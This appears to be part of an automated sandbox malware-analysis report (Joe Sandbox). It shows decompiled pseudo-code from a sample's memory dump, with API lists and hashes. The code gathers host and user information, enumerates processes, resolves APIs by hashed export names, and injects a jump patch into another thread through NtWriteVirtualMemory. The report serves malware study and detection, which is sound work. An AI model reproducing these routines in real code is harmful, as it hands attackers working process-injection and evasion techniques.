                                                                                                                                                                                              				intOrPtr _t123;
                                                                                                                                                                                              				intOrPtr _t134;
                                                                                                                                                                                              				intOrPtr _t136;
                                                                                                                                                                                              				intOrPtr _t138;
                                                                                                                                                                                              				intOrPtr _t141;
                                                                                                                                                                                              				intOrPtr _t143;
                                                                                                                                                                                              				intOrPtr _t148;
                                                                                                                                                                                              				void* _t149;
                                                                                                                                                                                              				WCHAR* _t150;
                                                                                                                                                                                              				char* _t151;
                                                                                                                                                                                              				intOrPtr _t162;
                                                                                                                                                                                              				intOrPtr _t177;
                                                                                                                                                                                              				void* _t191;
                                                                                                                                                                                              				struct _OSVERSIONINFOA* _t192;
                                                                                                                                                                                              				void* _t193;
                                                                                                                                                                                              				WCHAR* _t195;
                                                                                                                                                                                              				long _t198;
                                                                                                                                                                                              				void* _t199;
                                                                                                                                                                                              				char* _t200;
                                                                                                                                                                                              				void* _t203;
                                                                                                                                                                                              				int* _t204;
                                                                                                                                                                                              				void* _t216;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t216 = __fp0;
                                                                                                                                                                                              				_t148 =  *0x49af830; // 0x4990000
                                                                                                                                                                                              				_t68 = E04998BDE(0x1ac4);
                                                                                                                                                                                              				_t192 = _t68;
                                                                                                                                                                                              				if(_t192 != 0) {
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                                              					_t70 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
                                                                                                                                                                                              					_t3 = _t192 + 0x648; // 0x648
                                                                                                                                                                                              					E049A3548( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
                                                                                                                                                                                              					_t73 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					_t5 = _t192 + 0x1644; // 0x1644
                                                                                                                                                                                              					_t194 = _t5;
                                                                                                                                                                                              					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
                                                                                                                                                                                              					_t207 = _t74;
                                                                                                                                                                                              					if(_t74 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)(_t192 + 0x1854)) = E049995F3(_t194, _t207);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t75 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					_t77 = E0499C879( *((intOrPtr*)(_t75 + 0x12c))()); // executed
                                                                                                                                                                                              					 *(_t192 + 0x110) = _t77;
                                                                                                                                                                                              					_t159 =  *_t77;
                                                                                                                                                                                              					if(E0499C9F4( *_t77) == 0) {
                                                                                                                                                                                              						_t79 = E0499C8C9(_t159, _t194); // executed
                                                                                                                                                                                              						__eflags = _t79;
                                                                                                                                                                                              						_t162 = (0 | _t79 > 0x00000000) + 1;
                                                                                                                                                                                              						__eflags = _t162;
                                                                                                                                                                                              						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						 *((intOrPtr*)(_t192 + 0x214)) = 3;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t14 = _t192 + 0x220; // 0x220, executed
                                                                                                                                                                                              					_t80 = E0499F3A3(_t14); // executed
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
                                                                                                                                                                                              					_t81 = E0499F368(_t14); // executed
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
                                                                                                                                                                                              					_t17 = _t192 + 0x114; // 0x114
                                                                                                                                                                                              					_t195 = _t17;
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
                                                                                                                                                                                              					_v12 = 0x80;
                                                                                                                                                                                              					_v8 = 0x100;
                                                                                                                                                                                              					if(LookupAccountSidW(0,  *( *(_t192 + 0x110)), _t195,  &_v12,  &_v656,  &_v8,  &_v16) == 0) {
                                                                                                                                                                                              						GetLastError();
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t90 = GetSystemMetrics(0x1000);
                                                                                                                                                                                              					_t28 = _t192 + 0x228; // 0x228
                                                                                                                                                                                              					_t149 = _t28;
                                                                                                                                                                                              					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
                                                                                                                                                                                              					E0499DF36(_t149); // executed
                                                                                                                                                                                              					_t211 = _t149;
                                                                                                                                                                                              					if(_t149 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)(_t192 + 0x434)) = E049995F3(_t149, _t211);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t92 = E0499C6CE();
                                                                                                                                                                                              					_t33 = _t192 + 0xb0; // 0xb0
                                                                                                                                                                                              					_t196 = _t33;
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
                                                                                                                                                                                              					_t93 = E0499C4C1(_t92, _t33, _t211, _t216);
                                                                                                                                                                                              					_t35 = _t192 + 0xd0; // 0xd0
                                                                                                                                                                                              					E049999DF(_t93, _t33, _t35);
                                                                                                                                                                                              					_t36 = _t192 + 0x438; // 0x438
                                                                                                                                                                                              					E0499960D(_t149, _t36);
                                                                                                                                                                                              					_t97 = E0499E2C5(_t196, E0499A43D(_t33), 0);
                                                                                                                                                                                              					_t37 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                                              					E0499C6E4(_t97, _t37, _t216);
                                                                                                                                                                                              					_t99 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					_t101 = E0499CA46( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
                                                                                                                                                                                              					E04998D6D(_t192, 0, 0x9c);
                                                                                                                                                                                              					_t204 = _t203 + 0xc;
                                                                                                                                                                                              					_t192->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                              					GetVersionExA(_t192);
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0xa8)) = E0499DD39(_t100);
                                                                                                                                                                                              					_t106 = E0499DD62(_t105);
                                                                                                                                                                                              					_t41 = _t192 + 0x1020; // 0x1020
                                                                                                                                                                                              					_t150 = _t41;
                                                                                                                                                                                              					 *((short*)(_t192 + 0x9c)) = _t106;
                                                                                                                                                                                              					GetWindowsDirectoryW(_t150, 0x104);
                                                                                                                                                                                              					_t108 = E04999DF2(_t105, 0x9cf);
                                                                                                                                                                                              					_t177 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					_t198 = _t108;
                                                                                                                                                                                              					 *_t204 = 0x104;
                                                                                                                                                                                              					_push( &_v668);
                                                                                                                                                                                              					_push(_t198);
                                                                                                                                                                                              					_v8 = _t198;
                                                                                                                                                                                              					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
                                                                                                                                                                                              						_t143 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E04998BAF( &_v8);
                                                                                                                                                                                              					_t113 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					_t48 = _t192 + 0x1434; // 0x1434
                                                                                                                                                                                              					_t199 = _t48;
                                                                                                                                                                                              					 *_t204 = 0x209;
                                                                                                                                                                                              					_push(_t199);
                                                                                                                                                                                              					_push(L"USERPROFILE");
                                                                                                                                                                                              					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
                                                                                                                                                                                              						E04999E51(_t199, 0x105, L"%s\\%s", _t150);
                                                                                                                                                                                              						_t141 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              						_t204 =  &(_t204[5]);
                                                                                                                                                                                              						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0x20a);
                                                                                                                                                                                              					_t51 = _t192 + 0x122a; // 0x122a
                                                                                                                                                                                              					_t151 = L"TEMP";
                                                                                                                                                                                              					_t116 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					_push(_t151);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
                                                                                                                                                                                              						_t138 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0x40);
                                                                                                                                                                                              					_t200 = L"SystemDrive";
                                                                                                                                                                                              					_push( &_v144);
                                                                                                                                                                                              					_t119 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					_push(_t200);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
                                                                                                                                                                                              						_t136 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v8 = 0x7f;
                                                                                                                                                                                              					_t59 = _t192 + 0x199c; // 0x199c
                                                                                                                                                                                              					_t123 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
                                                                                                                                                                                              					_t62 = _t192 + 0x100c; // 0x100c
                                                                                                                                                                                              					E049A3548(E0499E2C5(_t62, E0499A43D(_t62), 0),  &_v2644);
                                                                                                                                                                                              					_t63 = _t192 + 0x1858; // 0x1858
                                                                                                                                                                                              					E049A351A( &_v2644, _t63, 0x20);
                                                                                                                                                                                              					_push( &_v2644);
                                                                                                                                                                                              					_push(0x1e);
                                                                                                                                                                                              					_t66 = _t192 + 0x1878; // 0x1878
                                                                                                                                                                                              					_t191 = 0x14;
                                                                                                                                                                                              					E049996DA(_t66, _t191);
                                                                                                                                                                                              					_t134 = E0499DAE3(_t191); // executed
                                                                                                                                                                                              					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
                                                                                                                                                                                              					return _t192;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t68;
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x0499e173
                                                                                                                                                                                              0x0499e174
                                                                                                                                                                                              0x0499e175
                                                                                                                                                                                              0x0499e180
                                                                                                                                                                                              0x0499e182
                                                                                                                                                                                              0x0499e189
                                                                                                                                                                                              0x0499e189
                                                                                                                                                                                              0x0499e193
                                                                                                                                                                                              0x0499e198
                                                                                                                                                                                              0x0499e19d
                                                                                                                                                                                              0x0499e19d
                                                                                                                                                                                              0x0499e1a3
                                                                                                                                                                                              0x0499e1aa
                                                                                                                                                                                              0x0499e1ab
                                                                                                                                                                                              0x0499e1b8
                                                                                                                                                                                              0x0499e1cb
                                                                                                                                                                                              0x0499e1d0
                                                                                                                                                                                              0x0499e1d5
                                                                                                                                                                                              0x0499e1de
                                                                                                                                                                                              0x0499e1de
                                                                                                                                                                                              0x0499e1e4
                                                                                                                                                                                              0x0499e1e9
                                                                                                                                                                                              0x0499e1ef
                                                                                                                                                                                              0x0499e1f5
                                                                                                                                                                                              0x0499e1fa
                                                                                                                                                                                              0x0499e203
                                                                                                                                                                                              0x0499e205
                                                                                                                                                                                              0x0499e20c
                                                                                                                                                                                              0x0499e20c
                                                                                                                                                                                              0x0499e212
                                                                                                                                                                                              0x0499e21a
                                                                                                                                                                                              0x0499e21f
                                                                                                                                                                                              0x0499e220
                                                                                                                                                                                              0x0499e225
                                                                                                                                                                                              0x0499e22e
                                                                                                                                                                                              0x0499e230
                                                                                                                                                                                              0x0499e23b
                                                                                                                                                                                              0x0499e23b
                                                                                                                                                                                              0x0499e244
                                                                                                                                                                                              0x0499e24c
                                                                                                                                                                                              0x0499e253
                                                                                                                                                                                              0x0499e258
                                                                                                                                                                                              0x0499e267
                                                                                                                                                                                              0x0499e27f
                                                                                                                                                                                              0x0499e286
                                                                                                                                                                                              0x0499e294
                                                                                                                                                                                              0x0499e29f
                                                                                                                                                                                              0x0499e2a0
                                                                                                                                                                                              0x0499e2a4
                                                                                                                                                                                              0x0499e2aa
                                                                                                                                                                                              0x0499e2ab
                                                                                                                                                                                              0x0499e2b3
                                                                                                                                                                                              0x0499e2b8
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0499e2c0
                                                                                                                                                                                              0x0499e2c4

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04998BDE: RtlAllocateHeap.NTDLL(00000008,?,?,0499959D,00000100,?,04996507), ref: 04998BEC
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0499DF64
                                                                                                                                                                                              • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 0499E057
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0499E05E
                                                                                                                                                                                              • GetSystemMetrics.USER32(00001000), ref: 0499E06E
                                                                                                                                                                                              • GetVersionExA.KERNEL32(00000000), ref: 0499E123
                                                                                                                                                                                                • Part of subcall function 0499C8C9: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04990000), ref: 0499C96D
                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 0499E14E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccountAllocateChangeCloseCurrentDirectoryErrorFindHeapLastLookupMetricsNotificationProcessSystemVersionWindows
                                                                                                                                                                                              • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                              • API String ID: 377074508-2706916422
                                                                                                                                                                                              • Opcode ID: 726b57653db3550987a1fe931fdd7967384578de2091363f11e77bee072105d7
                                                                                                                                                                                              • Instruction ID: 5ca74d182fb35effaab907639f8ed051bf95ee12550285f2e643f39d9b0e1076
                                                                                                                                                                                              • Opcode Fuzzy Hash: 726b57653db3550987a1fe931fdd7967384578de2091363f11e77bee072105d7
                                                                                                                                                                                              • Instruction Fuzzy Hash: FE915C71B00605ABEB04EB78D889FEAB7E8FF49304F004179E51A97280DB74BD558BE5
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 142 499d959-499d972 call 499d218 145 499d978-499d986 call 499d447 142->145 146 499da4b-499da56 call 499d38b 142->146 145->146 151 499d98c-499d9c3 call 4998d6d GetThreadContext 145->151 151->146 154 499d9c9-499da09 NtProtectVirtualMemory 151->154 155 499da49 154->155 156 499da0b-499da26 NtWriteVirtualMemory 154->156 155->146 156->155 157 499da28-499da47 NtProtectVirtualMemory 156->157 157->146 157->155
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0499D959(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				void* _v16;
                                                                                                                                                                                              				intOrPtr _v23;
                                                                                                                                                                                              				void _v24;
                                                                                                                                                                                              				long _v28;
                                                                                                                                                                                              				struct _CONTEXT _v744;
                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              				void* _t57;
                                                                                                                                                                                              				long _t59;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              				void** _t65;
                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t65 = __edx;
                                                                                                                                                                                              				_t57 = __ecx;
                                                                                                                                                                                              				_t66 = 0;
                                                                                                                                                                                              				if(E0499D218(__ecx, __edx, __edx, 0) != 0) {
                                                                                                                                                                                              					_t33 = E0499D447( *((intOrPtr*)(__edx)), _a4); // executed
                                                                                                                                                                                              					_t66 = _t33;
                                                                                                                                                                                              					if(_t66 != 0) {
                                                                                                                                                                                              						E04998D6D( &_v744, 0, 0x2cc);
                                                                                                                                                                                              						_v744.ContextFlags = 0x10002;
                                                                                                                                                                                              						if(GetThreadContext(_t65[1],  &_v744) != 0) {
                                                                                                                                                                                              							_t62 = _v744.Eax;
                                                                                                                                                                                              							_v12 = _v12 & 0x00000000;
                                                                                                                                                                                              							_v24 = 0xe9;
                                                                                                                                                                                              							_t59 = 5;
                                                                                                                                                                                              							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
                                                                                                                                                                                              							_v8 = _t59;
                                                                                                                                                                                              							_v16 = _t62;
                                                                                                                                                                                              							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
                                                                                                                                                                                              								L6:
                                                                                                                                                                                              								_t66 = 0;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_v28 = _v28 & 0x00000000;
                                                                                                                                                                                              								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E0499D38B();
                                                                                                                                                                                              				return _t66;
                                                                                                                                                                                              			}




















                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0499D218: LoadLibraryW.KERNEL32 ref: 0499D312
                                                                                                                                                                                                • Part of subcall function 0499D447: NtCreateSection.NTDLL(0499D982,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 0499D4B9
                                                                                                                                                                                                • Part of subcall function 0499D447: RegisterClassExA.USER32(?), ref: 0499D50D
                                                                                                                                                                                                • Part of subcall function 0499D447: CreateWindowExA.USER32 ref: 0499D538
                                                                                                                                                                                                • Part of subcall function 0499D447: DestroyWindow.USER32(00000000), ref: 0499D543
                                                                                                                                                                                                • Part of subcall function 0499D447: UnregisterClassA.USER32 ref: 0499D54E
                                                                                                                                                                                                • Part of subcall function 04998D6D: memset.MSVCRT ref: 04998D7F
                                                                                                                                                                                              • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 0499D9BB
                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 0499DA04
                                                                                                                                                                                              • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 0499DA21
                                                                                                                                                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 0499DA42
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1578692462-0
                                                                                                                                                                                              • Opcode ID: 2004da3fcedbf2b9b1bb3044790da3a51cbe7a85e30c59dc4ffd8b48836e75a4
                                                                                                                                                                                              • Instruction ID: 16414a9a859ec0cd401d2848ee5fb2163b21b9c0331e4382046b84cf2ec02cab
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2004da3fcedbf2b9b1bb3044790da3a51cbe7a85e30c59dc4ffd8b48836e75a4
                                                                                                                                                                                              • Instruction Fuzzy Hash: B2312C72A0110AAFDB11DFA9D985FDEBBFCAF88314F1042B5E504E2154D730EE558B91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                              			E0499B96A(void* __ecx, void* __edx) {
                                                                                                                                                                                              				void* _v304;
                                                                                                                                                                                              				void* _v308;
                                                                                                                                                                                              				intOrPtr _v312;
                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                              				signed int _t17;
                                                                                                                                                                                              				intOrPtr _t30;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              				void* _t43;
                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t33 = __edx;
                                                                                                                                                                                              				_v304 = __ecx;
                                                                                                                                                                                              				_t16 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                              				_t45 = _t16;
                                                                                                                                                                                              				_t17 = _t16 | 0xffffffff;
                                                                                                                                                                                              				if(_t45 != _t17) {
                                                                                                                                                                                              					E04998D6D( &_v304, 0, 0x128);
                                                                                                                                                                                              					_v304 = 0x128;
                                                                                                                                                                                              					if(Process32First(_t45,  &_v304) != 0) {
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							_t43 = _v312( &_v308, _t33);
                                                                                                                                                                                              						} while (_t43 != 0 && Process32Next(_t45,  &_v308) != 0);
                                                                                                                                                                                              						FindCloseChangeNotification(_t45);
                                                                                                                                                                                              						_t17 = 0 | _t43 == 0x00000000;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t30 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              						 *((intOrPtr*)(_t30 + 0x30))(_t45);
                                                                                                                                                                                              						_t17 = 0xfffffffe;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t17;
                                                                                                                                                                                              			}













                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 0499B988
                                                                                                                                                                                                • Part of subcall function 04998D6D: memset.MSVCRT ref: 04998D7F
                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 0499B9B8
                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 0499B9EB
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0499B9F8
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32memset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2518216231-0
                                                                                                                                                                                              • Opcode ID: ee1264b1b0c3e8883b41cd6f924000ace11d30aaeb2146518674763d47a4b619
                                                                                                                                                                                              • Instruction ID: bbc3cfa5108f8549cf2dcbf1d47d9f0cd759e6c53a27b8fe187dd255eec05d21
                                                                                                                                                                                              • Opcode Fuzzy Hash: ee1264b1b0c3e8883b41cd6f924000ace11d30aaeb2146518674763d47a4b619
                                                                                                                                                                                              • Instruction Fuzzy Hash: B7118E726043016BC710DAACE849E9A7BECFF85360F140A39F565C7180EB25E90587A6
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0499EEBB(void* __ecx, intOrPtr __edx) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                              				signed int _t47;
                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                              				struct HINSTANCE__* _t58;
                                                                                                                                                                                              				_Unknown_base(*)()* _t59;
                                                                                                                                                                                              				intOrPtr _t60;
                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                              				intOrPtr _t63;
                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                              				char _t70;
                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                              				CHAR* _t80;
                                                                                                                                                                                              				void* _t82;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t75 = __ecx;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                                                                                              				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                                                                                                                                                                              				if(_t41 == 0) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t62 = _t41 + __ecx;
                                                                                                                                                                                              				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                                                                                                                                                                              				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                              				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                                                                                                                                                                              				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                                                                                                                                                                              				_t47 = 0;
                                                                                                                                                                                              				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_v16 = _t63;
                                                                                                                                                                                              				if(_t63 == 0) {
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					goto L2;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					L2:
                                                                                                                                                                                              					_t49 = E0499E2C5( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0499A43D( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                                                                                                                                                                              					_t51 = _v8;
                                                                                                                                                                                              					if((_t49 ^ 0x218fe95b) == _v12) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t73 = _v20;
                                                                                                                                                                                              					_t47 = _t51 + 1;
                                                                                                                                                                                              					_v8 = _t47;
                                                                                                                                                                                              					if(_t47 < _v16) {
                                                                                                                                                                                              						continue;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                                                                                                                                                                              				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                                                                                                                                                                              				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                                                                                                                                                                              					return _t80;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t56 = 0;
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_t70 = _t80[_t56];
                                                                                                                                                                                              						if(_t70 == 0x2e || _t70 == 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                                                                                                                                                                              						_t56 = _t56 + 1;
                                                                                                                                                                                              						if(_t56 < 0x40) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                                                                                                                                                                              					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                                                                                                                                                                              					if( *((char*)(_t56 + _t80)) != 0) {
                                                                                                                                                                                              						_t80 =  &(( &(_t80[1]))[_t56]);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t40 =  &_v92; // 0x6c6c642e
                                                                                                                                                                                              					_t58 = LoadLibraryA(_t40); // executed
                                                                                                                                                                                              					if(_t58 == 0) {
                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t59 = GetProcAddress(_t58, _t80);
                                                                                                                                                                                              					if(_t59 == 0) {
                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _t59;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}


























                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 0499EF8B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0499EF97
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                                                                                                              • String ID: .dll
                                                                                                                                                                                              • API String ID: 2574300362-2738580789
